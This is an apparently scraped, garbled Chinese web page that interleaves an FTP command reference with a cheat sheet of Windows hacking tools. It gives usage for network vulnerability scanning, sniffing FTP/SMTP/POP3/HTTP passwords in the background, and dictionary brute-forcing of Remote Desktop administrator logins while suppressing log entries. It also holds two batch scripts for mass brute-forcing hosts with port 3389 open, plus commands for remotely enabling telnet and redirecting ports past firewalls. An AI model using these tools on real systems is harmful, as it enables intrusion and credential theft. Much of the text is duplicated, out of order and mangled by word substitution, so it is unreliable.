    22.hash:每传输1024字节,呈现二个hash符号(#)。

    26.lcd[dir]:将地方工作目录切换至dir。

      -log 文件名 钦点扫描报告文本名 (后缀为:TXT或HTML格式的文本)

    23.help[cmd]:呈现ftp内部命令cmd的协理信息,如:help get24.idle[seconds]:将长途服务器的蛰伏放大计时器设为[seconds]秒。

    27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入当和姑件local-file。 

      用法示例

    25.image:设置二进制传输方式(同binary)。 

    28.macdef macro-name:定义叁个宏,碰到macdef下的空行时,宏定义甘休。

      xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检查实验192.168.1.1-192.168.255.255网段内主机的享有漏洞,跳过无响应的主机

    26.lcd[dir]:将地面专业目录切换至dir。

    29.mdelete[remote-file]:删除远程主机文件。 

      xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检验192.168.1.1-192.168.255.255网段内主机的正经端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检查实验到开放端口的主机

    27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入当半夏件local-file。 

    30.mdir remote-files local-file:与dir类似,但可钦定八个长途文件,如 :mdir *.o.*.zipoutfile 。

      xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检查实验“hostlist.txt”文件中列出的享有主机的专门的学业端口状态,CGI漏洞,最大并发线程数量为200,同有的时候刻最多检查评定5台主机,展现详细检查测验进程,跳过并未检查测量试验到开放端口的主机

    28.macdef macro-name:定义四个宏,境遇macdef下的空行时,宏定义结束。

    31.mget remote-files:传输多少个长途文件。 

      九:

    29.mdelete[remote-file]:删除远程主机文件。 

    32.mkdir dir-name:在中远距离主机中国建工业总集合团一索引。

      命令行格局嗅探器: xsniff.exe

    30.mdir remote-files local-file:与dir类似,但可钦点四个长途文件,如 :mdir *.o.*.zipoutfile 。

    33.mls remote-file local-file:同nlist,但可钦赐五个文本名。 

      可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

    31.mget remote-files:传输八个长途文件。 

    34.mode[modename]:将文件传输格局设置为modename, 缺省为stream格局。

      参数表达

    32.mkdir dir-name:在中远距离主机中国建工业总会企业一索引。

    35.modtime file-name:显示远程主机文件的末段修改时间。 

      -tcp 输出TCP数据报

    33.mls remote-file local-file:同nlist,但可钦定多个公文名。 

    36.mput local-file:将五个文件传输至远程主机。

      -udp 输出UDP数据报

    34.mode[modename]:将文件传输方式设置为modename, 缺省为stream格局。

    37.newer file-name: 假设远程机中file-name的退换时间比地点硬盘同名文件的时日更近,则重传该公文。

      -icmp 输出ICMP数据报

    35.modtime file-name:展现远程主机文件的末尾修改时间。 

    38.nlist[remote-dir][local-file]:展现远程主机目录的公文清单,并存入本地硬盘的local-file。

      -pass 过滤密码音讯

    36.mput local-file:将多少个文件传输至远程主机。

    39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的有些字符相互转变, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名改成a1,a2。 该命令极其适用于远程主机为非UNIX机的处境。

      -hide 后台运行

    37.newer file-name: 假使远程机中file-name的修改时间比本地硬盘同名文件的小运更近,则重传该公文。

    40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1PRADO,则文件名LLL将改成帕杰罗中华V奥迪Q5。

      -host 深入分析主机名

    38.nlist[remote-dir][local-file]:彰显远程主机目录的文件清单,并存入本地硬盘的local-file。

    41.open host[port]:创立钦定ftp服务器连接,可内定连接端口。 

      -addr IP地址 过滤IP地址

    39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的有些字符互相转变, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名改成a1,a2。 该命令极其适用于远程主机为非UNIX机的情形。

    42.passive:进入被动传输形式。

      -port 端口 过滤端口

    40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1Wrangler,则文件名LLL将改成QX56TiguanKoleos。

    43.prompt:设置八个文件传输时的互相提醒。 

      -log 文件名 将出口保存到文件

    41.open host[port]:构造建设钦定ftp服务器连接,可钦定连接端口。 

    44.proxy ftp-cmd:在次要调节连接中,实施一条ftp命令, 该命令允许连接多个ftp服务器,以在几个服务器间传输文件。第一条ftp命令必须为open,以第百分之十立八个服务器间的三番五次。

      -asc 以ASCII格局出口

    42.passive:进入被动传输形式。

    45.put local-file[remote-file]:将地点文件local-file传送至远程主机。 

      -hex 以16进制情势出口

    43.prompt:设置多个文件传输时的并行提醒。 

    46.pwd:展现远程主机的当前工作目录。

      用法示例

    44.proxy ftp-cmd:在其次调控连接中,实践一条ftp命令, 该命令允许连接多个ftp服务器,以在五个劳务器间传输文件。第一条ftp命令必须为open,以率先创设八个服务器间的连日。

    47.quit:同bye,退出ftp会话。 

      xsniff.exe -pass -hide -log pass.log 后台运营嗅探密码并将密码音讯保存在pass.log文件中

    45.put local-file[remote-file]:将当麻芋果件local-file传送至远程主机。 

    48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.

      xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp新闻并以ASCII格式输出

    46.pwd:呈现远程主机的当前职业目录。

    49.recv remote-file[local-file]:同get。 

      终端服务密码破解: tscrack.exe

    47.quit:同bye,退出ftp会话。 

    50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。

      参数表达

    48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.

    51.rhelp[cmd-name]:乞请得到远程主机的帮手。 

      -h 突显应用支持

    49.recv remote-file[local-file]:同get。 

    52.rstatus[file-name]:若未钦命文件名,则呈现远程主机的意况, 不然彰显文件状态。

      -v 显示版本消息

    50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。

    53.rename[from][to]:退换远程主机文件名。 

      -s 在显示屏上打出解密本领

    51.rhelp[cmd-name]:乞求获得远程主机的帮忙。 

    54.reset:清除回答队列。

      -b 密码错误时发出的声息

    52.rstatus[file-name]:若未钦点文件名,则显示远程主机的情形, 不然彰显文件状态。

    55.restart marker:从钦命的证明marker处,重新开头get或put,如:restart 130。 

      -t 同是发出多少个三番两次(多线程)

    53.rename[from][to]:更动远程主机文件名。 

    56.rmdir dir-name:删除远程主机目录。

      -N Prevent System Log entries on targeted server

    54.reset:清除回答队列。

    57.runique:设置文件名只一性存款和储蓄,若文件存在,则在原版的书文件后加后缀.1, .2等。 

      -U 卸载移除tscrack组件

    55.restart marker:从钦赐的申明marker处,重新初叶get或put,如:restart 130。 

    新葡亰496netCMD命令大全,Windows下DOS命令大全。58.send local-file[remote-file]:同put。

      -f 使用-f后边的密码

    56.rmdir dir-name:删除远程主机目录。

    59.sendport:设置PORT命令的施用。 

      -F 间隔时间(频率)

    57.runique:设置文件名只一性存款和储蓄,若文件存在,则在原版的书文件后加后缀.1, .2等。 

    60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。

      -l 使用-l后边的用户名

    58.send local-file[remote-file]:同put。

    61.size file-name:显示远程主机文件大小,如:site idle 7200。 

      -w 使用-w后边的密码字典

    59.sendport:设置PORT命令的采用。 

    62.status:展现当前ftp状态。

      -p 使用-p后边的密码

    60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。

    63.struct[struct-name]:将文件传输结构安装为struct-name, 缺省时接纳stream结构。 

      -D 登入主页面

    61.size file-name:突显远程主机文件大小,如:site idle 7200。 

    64.sunique:将长途主机文件名存款和储蓄装置为只一(与runique对应)。

      用法示例

    62.status:突显当前ftp状态。

    65.system:显示远程主机的操作系统类型。 

      tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登入密码

    63.struct[struct-name]:将文件传输结构安装为struct-name, 缺省时行使stream结构。 

    66.tenex:将文件传输类型设置为TENEX机的所需的连串。

      tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登录192.168.0.1的administrator用户

    64.sunique:将远程主机文件名存款和储蓄装置为只一(与runique对应)。

    67.tick:设置传输时的字节计数器。 

      @if not exist ipcscan.txt goto noscan

    65.system:显示远程主机的操作系统类型。 

    68.trace:设置包追踪。

      @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

    66.tenex:将文件传输类型设置为TENEX机的所需的花色。

    69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输格局。 

      nscan

    67.tick:设置传输时的字节计数器。 

    70.umask[newmask]:将长途服务器的缺省umask设置为newmask,如:umask 3

      @echo 3389.txt no find or scan faild

    68.trace:设置包追踪。

    71.user user-name[password][account]:向远程主机注解自身的身份,须要口令时,必须输入口令,如:user anonymous my@email。 

      (①存为3389.bat) (借使现成用SuperScan或任何扫锚器扫到一群开有3389的主机IP列表文件3389.txt)

    69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输情势。 

    72.verbose:同命令行的-v参数,即设置详细报告办法,ftp 服务器的富有响 应都将显示给用户,缺省为on.

      3389.bat意思是:从3389.txt文本中取八个IP,接着运转hack.bat

    70.umask[newmask]:将长途服务器的缺省umask设置为newmask,如:umask 3

    73.?[cmd]:同help.   

      @if not exist tscrack.exe goto noscan

    71.user user-name[password][account]:向远程主机注脚自个儿的身份,供给口令时,必须输入口令,如:user anonymous my@email。 

      @tscrack %1 -l administrator -w pass.dic >>rouji.txt

    72.verbose:同命令行的-v参数,即设置详细报告办法,ftp 服务器的有所响 应都将显示给用户,缺省为on.

      :noscan

    73.?[cmd]:同help. 

      @echo tscrack.exe no find or scan faild

      (②存为hack.bat) (运转3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同二个目录下;就足以等待结果了)

      hack.bat意思是:运转tscrack.exe用字典暴破3389.txt中负有主机的administrator密码,并将破解结果保存在rouji.txt文件中。

      其它

      Shutdown.exe

      Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2000连串自带工具,在Windows3000下用进就得下载此工具技能用。在日前Windows 二零零三 DOS命令中有详细介绍。)

      fpipe.exe (TCP端口重定向工具) 在其次篇中有详实表明(端口重定向绕过防火墙)

      fpipe -l 80 -s 1029 -r 80 当有人扫锚你的80端口时,他扫到的结果会全盘是的主机音讯

      Fpipe -l 23 -s 88 -r 23 指标IP 把本机向目的IP发送的23端口Telnet请求经端口重定向后,就经过88端口发送到指标IP的23端口。(与目的IP营造Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接受指标IP的23端口了。

      OpenTelnet.exe (远程开启telnet工具)

      opentelnet.exe IP 帐号 密码 ntlm认证方法 Telnet端口 (无需上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。

      NTLM认证格局:0:不应用NTLM身份验证;1:先品尝NTLM身份验证,假使战败,再选拔用户名和密码;2:只使用NTLM身份验证。

      ResumeTelnet.exe (OpenTelnet附带的另三个工具)

      resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用那些命令将对方的Telnet设置还原,并相同的时候关闭Telnet服务。

      FTP命令详解

      FTP命令是Internet用户选用最频仍的下令之一,了解并灵活使用FTP的里边命令,能够大大方便使用者,并接受一举两得之效。若是您想学学生运动用举办后台FTP下载,那么就非得学习FTP指令。

      FTP的一声令下行格式为:

    新葡亰496netCMD命令大全,Windows下DOS命令大全。  ftp -v -d -i -n -g [主机名] ,其中

      -v 呈现远程服务器的全部响应音讯

      -n 限制ftp的活动登入,即不选用;.n etrc文件;

      -d 使用调试情势;

      -g 撤消全局文件名。

      FTP使用的个中命令如下(中括号表示可挑选):

      1.![cmd[args]]:在本土机中实践交互shell,exit回到ftp景况,如:!ls*.zip

      2.$ macro-ame[args]: 试行宏定义macro-name。

      3.account[password]: 提供登入远程系统成功后走访系统财富所需的补给口令。

      4.append local-file[remote-file]:将地面文件增添到长途系统主机,若未内定远程系统文件名,则运用当麻芋果件名。

      5.ascii:使用ascii类型传输格局。

      6.bell:各种命令实践实现后Computer响铃一回。

      7.bin:使用二进制文件传输方式。

      8.bye:退出ftp会话进度。

      9.case:在行使mget时,将远程主机文件名中的大写转为小写字母。

      10. cd remote-dir:进入远程主机目录。

      11.cdup:进入远程主机目录的父目录。

      12.chmod mode file-name:将远程主机文件file-name的存取情势设置为mode,如:chmod 777 a.out。

      13.close:中断与远程服务器的ftp会话(与open对应)。

      14 .cr:使用asscii格局传输文件时,将回车换行转变为回行。

      15.delete remote-file:删除远程主机文件。

      16.debug[debug-value]:设置调节和测验情势, 突显发送至远程主机的每条命令,如:deb up 3,若设为0,表示撤消debug。

      17.dir[remote-dir][local-file]:呈现远程主机目录,并将结果存入当半夏件。

      18.disconnection:同close。

      19.form format:将文件传输格局设置为format,缺省为file形式。

      20.get remote-file[local-file]: 将长途主机的文书remote-file传至本地硬盘的local-file。

      21.glob:设置mdelete,mget,mput的文件名扩张,缺省时不扩充文件名,同命令行的-g参数。

      22.hash:每传输1024字节,展现八个hash符号(#)。

      23.help[cmd]:呈现ftp内部命令cmd的佑助新闻,如:help get。

      24.idle[seconds]:将远程服务器的休眠沙漏设为[seconds]秒。

      25.image:设置二进制传输方式(同binary)。

      26.lcd[dir]:将地面工作目录切换至dir。

      27. ls[remote-dir][local-file]:呈现远程目录remote-dir, 并存入当和姑件local-file。

      28.macdef macro-name:定义一个宏,境遇macdef下的空行时,宏定义截止。

      29.mdelete[remote-file]:删除远程主机文件。

      30.mdir remote-files local-file:与dir类似,但可钦点多少个长途文件,如 :mdir *.o.*.zipoutfile 。

      31.mget remote-files:传输八个长途文件。

      32.mkdir dir-name:在长距离主机中国建筑工程总集团一索引。

      33.mls remote-file local-file:同nlist,但可内定七个文件名。

      34.mode[modename]:将文件传输格局设置为modename, 缺省为stream格局。

      35.modtime file-name:显示远程主机文件的末梢修改时间。

      36.mput local-file:将七个文件传输至远程主机。

      37.newer file-name: 假诺远程机中file-name的修改时间比本地硬盘同名文件的日子更近,则重传该公文。

      38.nlist[remote-dir][local-file]:呈现远程主机目录的文件清单,并存入本地硬盘的local-file。

      39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的有个别字符互相转变, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名改成a1,a2。 该命令特别适用于远程主机为非UNIX机的情景。

      40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans第11中学华V,则文件名LLL将改为ENCORE凯雷德奥迪Q7。

      41.open host[port]:创设钦点ftp服务器连接,可钦赐连接端口。

      42.passive:进入被动传输方式。

      43.prompt:设置八个文件传输时的并行提示。

      44.proxy ftp-cmd:在次要调节连接中,实践一条ftp命令, 该命令允许连接四个ftp服务器,以在多个服务器间传输文件。第一条ftp命令必须为open,以第10%立七个服务器间的接连。

      45.put local-file[remote-file]:将当半夏件local-file传送至远程主机。

      46.pwd:呈现远程主机的当前专业目录。

      47.quit:同bye,退出ftp会话。

      48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.

      49.recv remote-file[local-file]:同get。

      50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。

      51.rhelp[cmd-name]:乞请获得远程主机的帮助。

      52.rstatus[file-name]:若未内定文件名,则展现远程主机的事态, 不然显示文件状态。

      53.rename[from][to]:更动远程主机文件名。

      54.reset:清除回答队列。

      55.restart marker:从钦命的申明marker处,重新开端get或put,如:restart 130。

      56.rmdir dir-name:删除远程主机目录。

      57.runique:设置文件名只一性存款和储蓄,若文件存在,则在原来的文章件后加后缀.1, .2等。

      58.send local-file[remote-file]:同put。

      59.sendport:设置PORT命令的运用。

      60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。

      61.size file-name:展现远程主机文件大小,如:site idle 7200。

      62.status:显示当前ftp状态。

      63.struct[struct-name]:将文件传输结构安装为struct-name, 缺省时利用stream结构。

      64.sunique:将长途主机文件名存款和储蓄装置为只一(与runique对应)。

      65.system:展现远程主机的操作系统类型。

      66.tenex:将文件传输类型设置为TENEX机的所需的品类。

      67.tick:设置传输时的字节计数器。

      68.trace:设置包追踪。

      69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。

      70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3

      71.user user-name[password][account]:向远程主机申明本人的地位,必要口令时,必须输入口令,如:user anonymous my@email。

      72.verbose:同命令行的-v参数,即设置详细报告办法,ftp 服务器的保有响 应都将显得给用户,缺省为on.

      73.?[cmd]:同help.

    本文由新葡亰496net发布于电脑系统,转载请注明出处:新葡亰496netCMD命令大全,Windows下DOS命令大全

    关键词:

上一篇:新葡亰496net:nodejs API(一)

下一篇:没有了